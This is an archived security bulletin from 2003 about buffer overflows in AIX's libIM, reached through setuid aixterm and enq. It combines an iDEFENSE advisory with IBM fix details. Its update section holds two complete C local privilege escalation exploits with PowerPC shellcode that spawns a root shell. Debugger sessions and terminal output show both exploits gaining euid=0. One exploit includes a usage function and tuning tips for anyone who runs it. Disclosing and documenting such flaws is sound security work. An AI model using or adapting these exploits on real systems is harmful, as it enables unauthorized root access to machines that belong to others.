TUCoPS :: Unix :: Various Flavours

TUCoPS :: Unix :: Various Flavours :: sb5987.htm
libIM.a Buffer Overflow
13th Feb 2003 [SBWID-5987]
COMMAND

	libIM.a Buffer Overflow

SYSTEMS AFFECTED

	Applications using libIM on AIX 4.3, 5.1 or 5.2 are affected.

PROBLEM

	In iDEFENSE Security Advisory [02.12.03] :
	
	 http://www.idefense.com/advisory/02.12.03.txt
	
	Credits to Euan Briggs [euan_briggs@btinternet.com]
	
	 I. BACKGROUND
	
	Advanced Interactive eXecutive  (AIX)  is  IBM  Corp.'s  Unix  operating
	system implementation, native  to  pSeries  and  RS/6000  servers.  More
	information is available at http://www-1.ibm.com/servers/aix/ .
	
	AIX provides support for National Language Support (NLS). From  the  AIX
	manual available at
	
	http://publib16.boulder.ibm.com/doc_link/en_US/a_doc_lib/aixprggd/nlsgdrf/nat_lang_support.htm 
	
	"NLS provides commands and Standard C Library subroutines for  a  single
	worldwide system base.  An  internationalized  system  has  no  built-in
	assumptions or dependencies on  language-specific  or  cultural-specific
	conventions such as:
	
	Code sets
	Character classifications
	Character comparison rules
	Character collation order
	Numeric and monetary formatting
	Date and time formatting
	Message-text language
	
	All information pertaining  to  cultural  conventions  and  language  is
	obtained at process run time."
	
	libIM is a system library used by NLS on AIX.
	
	
	 II. DESCRIPTION
	
	Locally exploiting a buffer overflow within libIM allows an attacker  to
	obtain the  privileges  of  an  application  calling  the  library.  The
	"/usr/lpp/X11/bin/aixterm" binary calls the libIM library  and  is  then
	installed setuid root by default on AIX.
	
	The "-im" command line argument used by aixterm  causes  the  binary  to
	crash when filled with a string about 50 bytes in  length.  This  allows
	an attacker to gain control of  the  return  address  of  the  executing
	function, thereby allowing code execution with root privileges.
	
	
	 III. ANALYSIS
	
	Exploitation  can  provide  local  attackers  with  root  access  to  an
	affected system.
	
	The following shows how the "-im" command line argument  can  be  filled
	and cause the crash of aixterm, giving the user control  of  the  return
	address.
	 We will write the value of 0x11223344 into the appropriate register:
	
	$ ls -la /usr/lpp/X11/bin/aixterm
	- -rwsr-xr-x   1 root     system    376384 Mar 18 2001 
	/usr/lpp/X11/bin/aixterm*
	$ cp -p /usr/lpp/X11/bin/aixterm test
	$ ./test -im `perl -e'print"A"x47;print pack("l",0x11223344)'`
	1363-009  aixterm: Cannot open font -dt-interface
	user-medium-r-normal-l*-*-*-*-*-*-*-*-*.
	        Check path name and permissions.
	1363-009  aixterm: Cannot open font
	- -*-roman-medium-r-normal--8-50-100-100-c-*-ISO8859-1.
	        Check path name and permissions.
	Illegal instruction (core dumped)
	$ dbx ./test core
	Type 'help' for help.
	reading symbolic information ...warning: no source compiled with -g
	
	[using memory image in core]
	warning: Unable to access address 0x41414149 from core
	
	Illegal instruction (reserved addressing fault) in . at 0x11223344 ($t1)
	warning: Unable to access address 0x11223344 from core 0x11223344 (???)
	warning: Unable to access address 
	0x11223344 from core ffffffff   warning: Unable to access address
	0x11223344 from core fnmadd.   
	fr31,fr31,fr31,fr31 (dbx)
	
	
	--snap--
	
	 Update (18 February 2003)
	 ======
	
	/usr/bin/enq and /usr/bin/X11/aixterm exploit  in  AIX,  vulnerabilities
	found by Esa Etelavoun, iDEFFENSE,  author  green  [green@wowhacker.org]
	& dragory [dragory@wowhacker.org], Tested on AIX 4.3.3/RS6000
	
	 Reference: lsd-pl.net's exploit
	
	Thanks    to    wowcode    &    overhead    team    at     Wowhacker
	[http://www.wowhacker.org], I  tested  BOF  in  AIX  lately.  These  are
	exploits of /usr/bin/enq and /usr/bin/X11/aixterm  in  AIX.  (My  system
	language is Korean...)
	
	
	 1. /usr/bin/enq
	 ===============
	
	
	/*
	http://online.securityfocus.com/bid/2034
	[green@aix test]$ /usr/bin/enq -M `perl -e 'print "a"x2000'`
	enq: (&#44221;&#44256;): 0781-132 &#47700;&#49464;&#51648; &#54028;&#51068; 
	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&#51012;(&#47484;) &#50676; &#49688; &#50630;&#49845;&#45768;&#45796;.
	enq: errno = 86: &#54028;&#51068;&#51060;&#45208; &#44221;&#47196; &#51060;&#47492;&#51060; &#45320;&#47924; &#44609;&#45768;&#45796;.
	Segmentation fault
	[green@aix test]$ su -
	root&#51032; &#50516;&#54840;: 
	# gdb /usr/bin/enq
	GNU gdb 5.0-aix51-020209
	Copyright 2000 Free Software Foundation, Inc.
	GDB is free software, covered by the GNU General Public License, and you 
	are
	welcome to change it and/or distribute copies of it under certain 
	conditions.
	Type "show copying" to see the conditions.
	There is absolutely no warranty for GDB.  Type "show warranty" for details.
	This GDB was configured as "powerpc-ibm-aix4.3.3.0"...(no debugging 
	symbols found)...
	(gdb) r -M `perl -e 'print "abcd"x700'`
	Starting program: /usr/bin/enq -M `perl -e 'print "abcd"x700'`
	(no debugging symbols found)...(no debugging symbols found)...(no 
	debugging symbols found)...
	(no debugging symbols found)...(no debugging symbols found)...(no 
	debugging symbols found)...enq: (&#44221;&#44256;): 0781-132 &#47700;&#49464;&#51648; &#54028;&#51068; 
	abcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabc
	dabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdab
	cdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcda
	bcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcd
	abcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabc
	dabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdab
	cdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcda
	bcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcd
	abcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabc
	dabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdab
	cdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcda
	bcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcd
	abcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabc
	dabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdab
	cdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcda
	bcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcd
	abcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabc
	dabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdab
	cdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcda
	bcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcd
	abcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabc
	dabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdab
	cdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcda
	bcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcd
	abcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabc
	dabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdab
	cdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcda
	bcenq: (&#44221;&#44256;): 0781-132 &#47700;&#49464;&#51648; &#54028;&#51068; 
	abcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabc
	dabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdab
	cdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcda
	bcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcd
	abcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabc
	dabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdab
	cdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcda
	bcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcd
	abcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabc
	dabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdab
	cdabcdabcda
	enq: errno = 86: &#54028;&#51068;&#51060;&#45208; &#44221;&#47196; &#51060;&#47492;&#51060; &#45320;&#47924; &#44609;&#45768;&#45796;.
	
	Program received signal SIGSEGV, Segmentation fault.
	0x62636460 in ?? () from (unknown load module)
	(gdb) r -M `perl -e 'print "abcd"x5000'`
	The program being debugged has been started already.
	Start it from the beginning? (y or n) y
	Starting program: /usr/bin/enq -M `perl -e 'print "abcd"x5000'`
	
	Program received signal SIGSEGV, Segmentation fault.
	0xd018a654 in getenv ()
	(gdb) q
	[green@aix test]$ id
	uid=205(green) gid=1(staff)
	[green@aix test]$ ./aix_enq 
	enq: (WARNING): Can't open message 
	file //////////////////////////////////////////////////enq: (WARNING): 
	Can't open message 
	file /////////////////////////////////////////////////////?
	enq: errno = 86: File name too long
	# id
	uid=205(green) gid=1(staff) euid=0(root) egid=9(printq)
	# 
	
	exploited by green.
	*/
	#define ADRNUM      3000
	#define NOPNUM     16000
	#define ADR_ALLIGN     0
	#define ALLIGN         0
	
	
	char setreuidcode[]=
	        "\x7e\x94\xa2\x79\x40\x82\xff\xfd\x7e\xa8\x02\xa6\x3a\xb5\x01\x40"
	        "\x88\x55\xfe\xe0\x7e\x83\xa3\x78\x3a\xd5\xfe\xe4\x7e\xc8\x03\xa6"
	        "\x4c\xc6\x33\x42\x44\xff\xff\x02\x92\x03\xff\xff\x38\x75\xff\x04"
	        "\x38\x95\xff\x0c\x7e\x85\xa3\x78\x90\x75\xff\x0c\x92\x95\xff\x10"
	        "\x88\x55\xfe\xe1\x9a\x95\xff\x0b\x4b\xff\xff\xd8/bin/sh";
	
	char nop[]="\x7f\xff\xfb\x78";
	
	main(int argc,char **argv,char **e){
	    char buffer[3000],egg[20000],adr[4],*b,*envp[2];
	    int i;
	
	    i=0; while(*e++) i+=strlen(*e)+1;
	    *((unsigned long*)adr)=(unsigned long)e+(i&~3)-8000;
	
	    envp[0]=egg;
	    envp[1]=0;
	
	    b=buffer;
	    for(i=0;i<ADR_ALLIGN;i++) *b++=adr[i%4];
	    for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
	    *b=0;
	
	    b=egg;
	    sprintf(b,"xxx=");b+=4;
	    for(i=0; i<ALLIGN;i++) *b++=' ';
	    for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
	    for(i=0;i<strlen(setreuidcode);i++) *b++=setreuidcode[i];
	    *b=0;
	
	    execle("/usr/bin/enq", "enq", "-M", buffer, 0, envp);
	}
	
	
	 2. /usr/bin/X11/aixterm
	 =======================
	
	/*
	[dragory@aix dragory]$ cp /usr/bin/X11/aixterm ./test
	[dragory@aix dragory]$ ./test -display x.x.x.x:0 -im `perl -
	e 'print "x"x400'`
	Segmentation fault (core dumped)
	[dragory@aix dragory]$ gdb -q test core
	(no debugging symbols found)...Core was generated by `test'.
	Program terminated with signal 11, Segmentation fault.
	(no debugging symbols found)...(no debugging symbols found)...(no 
	debugging symbols found)...(no debugging symbols found)...
	(no debugging symbols found)...(no debugging symbols found)...(no 
	debugging symbols found)...(no debugging symbols found)...
	(no debugging symbols found)...(no debugging symbols found)...#0  
	0x78787878 in ?? () from (unknown load module)
	(gdb) q
	[dragory@aix dragory]$ ./test -display x.x.x.x:0 -im a`perl -
	e 'print "abcd"x100'`
	[dragory@aix dragory]$ gdb -q test core
	(no debugging symbols found)...Core was generated by `test'.
	Program terminated with signal 11, Segmentation fault.
	(no debugging symbols found)...(no debugging symbols found)...(no 
	debugging symbols found)...(no debugging symbols found)...
	(no debugging symbols found)...(no debugging symbols found)...(no 
	debugging symbols found)...(no debugging symbols found)...
	(no debugging symbols found)...(no debugging symbols found)...#0  
	0x63646160 in ?? () from (unknown load module)
	(gdb) q
	[dragory@aix dragory]$ ./test -display x.x.x.x:0 -im ab`perl -
	e 'print "abcd"x100'`
	[dragory@aix dragory]$ gdb -q test core
	(no debugging symbols found)...Core was generated by `test'.
	Program terminated with signal 11, Segmentation fault.
	(no debugging symbols found)...(no debugging symbols found)...(no 
	debugging symbols found)...(no debugging symbols found)...
	(no debugging symbols found)...(no debugging symbols found)...(no 
	debugging symbols found)...(no debugging symbols found)...
	(no debugging symbols found)...(no debugging symbols found)...#0  
	0x62636460 in ?? () from (unknown load module)
	(gdb) q
	[dragory@aix dragory]$ ./test -display x.x.x.x:0 -im abc`perl -
	e 'print "abcd"x100'`
	[dragory@aix dragory]$ gdb -q test core
	(no debugging symbols found)...Core was generated by `test'.
	Program terminated with signal 11, Segmentation fault.
	(no debugging symbols found)...(no debugging symbols found)...(no 
	debugging symbols found)...(no debugging symbols found)...
	(no debugging symbols found)...(no debugging symbols found)...(no 
	debugging symbols found)...(no debugging symbols found)...
	(no debugging symbols found)...(no debugging symbols found)...#0  
	0x61626364 in ?? () from (unknown load module)
	(gdb) q
	 
	//ADR_ALLIGN = 3
	 
	[dragory@aix dragory]$ uname
	AIX
	[dragory@aix dragory]$ ls -l /usr/bin/X11/aixterm
	-rwsr-xr-x   1 root     system    376096  7&#50900; 20 1999  /usr/bin/X11/aixterm
	[dragory@aix dragory]$ id
	uid=218(dragory) gid=1(staff)
	[dragory@aix dragory]$ gcc -o aixterm_exp aixterm_exp.c
	[dragory@aix dragory]$ ./aixterm_exp -d X.X.X.X:0
	# id
	uid=218(dragory) gid=1(staff) euid=0(root)
	# 
	
	The vulnerability was discovered by Euan Briggs.
	exploited by dragory.
	*/
	 
	//Original script is written by green
	#include <stdio.h>
	#include <unistd.h>
	#define ADRNUM      1000
	#define NOPNUM     16000
	#define ADR_ALLIGN     3
	#define ALLIGN         0
	#define HOST_IP "1.1.1.1:0"
	
	char setreuidcode[]=
	        "\x7e\x94\xa2\x79\x40\x82\xff\xfd\x7e\xa8\x02\xa6\x3a\xb5\x01\x40"
	        "\x88\x55\xfe\xe0\x7e\x83\xa3\x78\x3a\xd5\xfe\xe4\x7e\xc8\x03\xa6"
	        "\x4c\xc6\x33\x42\x44\xff\xff\x02\x92\x03\xff\xff\x38\x75\xff\x04"
	        "\x38\x95\xff\x0c\x7e\x85\xa3\x78\x90\x75\xff\x0c\x92\x95\xff\x10"
	        "\x88\x55\xfe\xe1\x9a\x95\xff\x0b\x4b\xff\xff\xd8/bin/sh";
	//This shellcode is used in AIX 4.3.x
	
	char nop[]="\x7f\xff\xfb\x78";
	
	main(int argc,char **argv,char **e) {
	    char buffer[3000],egg[20000],adr[4],*b,*envp[2], host_ip[] = HOST_IP;
	    int i, opt, adr_allign = ADR_ALLIGN, allign = ALLIGN;
	
	    if(argc < 2)
	    {
	        usage(argv[0]);
	        exit(0);
	    }
	
	    while((opt = getopt(argc, argv, "d:a:A:")) != -1)
	    {
	        switch(opt)
	        {
	            case 'd':
	                strcpy(host_ip, optarg);
	                break;
	            case 'a':
	                adr_allign = atoi(optarg);
	                break;
	            case 'A':
	                allign = atoi(optarg);
	                break;
	            case '?':
	                usage(argv[0]);
	                exit(0);
	        }
	    }
	
	    i=0; while(*e++) i+=strlen(*e)+1;
	    *((unsigned long*)adr)=(unsigned long)e+(i&~3)-8000; //http://lsd-pl.net
	
	    envp[0]=egg;
	    envp[1]=0;
	
	    b=buffer;
	    for(i=0;i<adr_allign;i++) *b++=adr[i%4];
	    for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
	    *b=0;
	
	    b=egg;
	    sprintf(b,"xxx=");b+=4;
	    for(i=0; i<allign;i++) *b++=' ';
	    for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
	    for(i=0;i<strlen(setreuidcode);i++) *b++=setreuidcode[i];
	    *b=0;
	
	    execle("/usr/bin/X11/aixterm", "aixterm", "-display", host_ip, "-im", buffer, 0, envp);
	}
	
	 
	
	usage(char *arg) {
	    printf("Usage : %s -d [Your X Server IP:0] -a [ADR_ALLIGN] -A [ALLIGN] \n", arg);
	    printf("Default : [Your X Server IP:0]=1.1.1.1:0 ADR_ALLIGN=3 ALLIGN=0 \n");
	    printf("If not exploited, you may modify ALLIGN, Your X Server IP\n");
	}
	

SOLUTION

	 VENDOR FIX/RESPONSE
	 ===================
	
	 A. E-fix
	 ========
	
	Temporary fixes for AIX 4.3.3, 5.1.0, and 5.2.0 systems are available.
	
	The temporary fixes can be downloaded via ftp from:
	
	     ftp://aix.software.ibm.com/aix/efixes/security/libIM_efix.tar.Z
	
	The efix compressed tarball contains  three  fixes:  one  each  for  AIX
	4.3.3, AIX 5.1.0 and AIX 5.2.0. It  also  includes  an  advisory  and  a
	README file with installation instructions.
	
	 B. Official Fix
	 ===============
	
	IBM will provide the following fixes:
	
	      APAR number for AIX 4.3.3: IY40307
	      APAR number for AIX 5.1.0: IY40317
	      APAR number for AIX 5.2.0: IY40320
	
	NOTE: Fixes will not be provided for versions prior to 4.3 as these  are
	no longer supported by IBM. Affected customers are urged to  upgrade  to
	4.3.3 or 5.1.0 at the latest maintenance level.
	
	 Update (18 February 2003)
	 ======
	
	Shiva Persaud of AIX Security says :
	
	 <1>
	
	The aixterm issue is addressed in an efix which can be downloaded from:
	
	     ftp://ftp.software.ibm.com/aix/efixes/security/libIM_efix.tar.Z.
	
	 <2>
	
	The enq issue was fixed in Feb 2000. The following filesets contain  the
	most current version of enq:
	
	For AIX 4.3.3:
	bos.rte.printers.4.3.3.78
	
	For AIX 5.1.0:
	bos.rte.printers.5.1.0.25
	
	For AIX 5.2.0:
	bos.rte.printers.5.2.0.0